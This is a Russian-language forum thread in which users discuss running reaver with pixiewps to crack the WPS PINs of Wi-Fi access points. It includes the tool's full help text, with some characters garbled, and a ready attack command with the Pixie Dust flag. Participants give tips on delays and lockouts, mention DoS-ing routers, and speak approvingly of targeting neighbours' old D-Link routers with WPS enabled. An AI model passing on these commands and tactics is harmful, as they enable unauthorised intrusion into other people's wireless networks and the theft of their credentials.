ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Захватывайте хозяина точки. Принуждайте его силой мысли залогиниться в админке. И перехватывайте пароль к ней.

скажите,кто какие флаги вообще ставит в pixie wps dust?ну я имею ввиду,какие обязательно лучше поставить,а то их вон дофига:

Обязательныеаргументы:

-i,--interface=Имясетевогоинтерфейс адляиспользования

-b,--bssid= BSSIDточкидоступа

Опциональныеаргументы:

-m,--mac= MACхостовойсистемы

-e,--essid=ESSIDцелевойТД

-c,--channel= Установитьканал802.11дляинте рфейса(подразумевает-f)

-o,--out-file= Установитьвыводвлог-файл[stdout]

-s,--session=Восстановитьфайлпреды дущейсессии

-C,--exec=Выполнитьданнуюкоманду� �ослеуспешногоподборапина

-D,--daemonize Переводreaverврежимдемона

-a,--autoАвтоматическиопределить лучшиепродвинутыеопциидля целевойТД

-f,--fixed Отключитьпрыганиепоканала м

-5,--5ghzИспользоватьканалы5GHz802.11

-v,--verbose Отображатьнекритическиепр едупреждения(-vvчтобыувидетьбольше)

-q,--quiet Отображатьтолькокритическ иепредупреждения

-K--pixie-dust= [1]ЗапускаетpixiewpsсPKE,PKR,E-Hash1,E-Hash2,E-NonceиAuthkey(Ralink,Broadcom,Realtek)

-Z,--no-auto-passНЕзапускатьreaverдляавтома тическогополученияпароляWP A,еслиатакаpixiewpsпрошлауспеш но

-h,--helpПоказатьсправку

Продвинутыеопции:

-p,--pin= Использоватьзаданный4или8ц ифровойWPSпин

-d,--delay= Установитьзадержкумеждупо пыткамипина[1]

-l,--lock-delay=Установитьвремяожидани я,еслиТДзаблокировалапопы� �киводапина[60]

-g,--max-attempts=Выйтипослечислапопыт� �кпина

-x,--fail-wait= Установитьвремядляпаузыпо сле10неожиданныхнеудач[0]

-r,--recurring-delay= Делатьпаузунаyсекундкажды� �xпопытокпина

-t,--timeout= Установитьпиреодтаймаутап олучения[5]

-T,--m57-timeout= УстановитьпериодтаймаутаM5/M7[0.20]

-A,--no-associateНесвязыватьсясТД(связ ьдолжнабытьсделанадругимп риложением)

-N,--no-nacksНеотправлятьсообщенияNAC Kкогдаполученыпакетыонеис� �равности

-S,--dh-smallИспользоватьмалыеDHключ� �дляускоренияскоростивзло� �а

-L,--ignore-locksИгнорироватьзаблокиров� �нныесостояния,полученныео тцелевойТД

-E,--eap-terminate ЗавершатькаждуюсессиюWPSпа� �етомEAP FAIL

-n,--nackЦелеваяТДвсегдашлётпаке тыNACK[Auto]

-w,--win7МимикрироватьподWindows7regist rar[False]

-X,--exhaustiveУстановитьисчерпываю щийрежимсначаласессии[False]

-1,--p1-indexУстановитьначальныйинд� �ксмассивадляпервойполови� �ыпина[False]

-2,--p2-indexУстановитьначальныйинд� �ксмассивадлявторойполови� �ыпина[False]

-P,--pixiedust-loopУстановкаврежимPixieLoop(нео тправляетM4иделаетпетлюнаM3 )[False]

-W,--generate-pinГенерациядефолтныхпинов� �ткомандыdevttys0[1]Belkin[2]D-Link

-H,--pixiedust-log Включитьлогированиепослед овательностейзавершённыхPi xieHashes

Ну вот и какую команду,с каким набором флагов поставить?

Интересна опция -Н(

Опция -H // —pixiedust-log в reaver

Опция -H — это переключатель включения логирования PixieHashes, сохранённые хеши будут размещены в директории запуска. Эта опция требует включения хотя бы -vvv, и, соответственно, работает с -K 1 & -P.

Имена сохранённых файлов соответствуют bssid (MAC) цели и имеют расширение .pixie. Внутри этих сохранённых логов вы найдёте все требуемые хеши PixieDust, а также готовые для копипасты полные команды для использованиях их в программе pixiewps. Также есть возможность выполнить их. Просто закиньте этот файл в ваш любимый шелл и выполните его (может понадобиться chmod +x ).

И тут возникает вопрос,а как сделать эти готовые для копипасты полные команды для использованиях их в программе pixiewps. Также есть возможность выполнить их. Просто закиньте этот файл в ваш любимый шелл и выполните его (может понадобиться chmod +x ).Т.е как выполнить эти полные команды,как закинуть файл в шелл и выполнить?Так как интересная вещь,насобирал штук 10 разных,не одинаковых хешей,потом по одному выполнить и мало ли,из 10 хешей и пин может найтись!Короче вопрос,как выполнить эти команды,как эти файлы в шелл закинуть и выполнить?Кто то уже так пробовал?

reaver -i wlanXmon -v -c X -b XX:XX:XX:XX:XX:XX -K 1

Что ещё нужно для счастья? Ну конечно же мануал, переведённый гугл транслейтом, и избавленный от лишних пробелов.

та это самая обычная команда,а флагов то вон полно,неужели все ненужные?

По ситуации. Иногда использую "-d 0", когда точка быстро обрабатывает пины.

она как быстро обрабатывает,так и быстро лочится))))сейчас это уже редкость,точки,на которых спокойно пины перебирать можно,сейчас все точки в лок уходят и как правило до ребута....

Как повезёт. Старенькие D-Link, которые всё ещё стоят за окошками ни в чём не подозревающих юзверей, до сих пор встречаются. И у меня самого такой стоял однажды, со включённым WPS, около 3-х лет! (да, я тогда ещё не знал, мы все когда-то не знали).

везёт тебе,у меня вокруг одни тп линки.которые лочаться до перезагруза и доссу не подвержены,пофиг им досс....

ну ваще хз, мен, может СЕРЖ?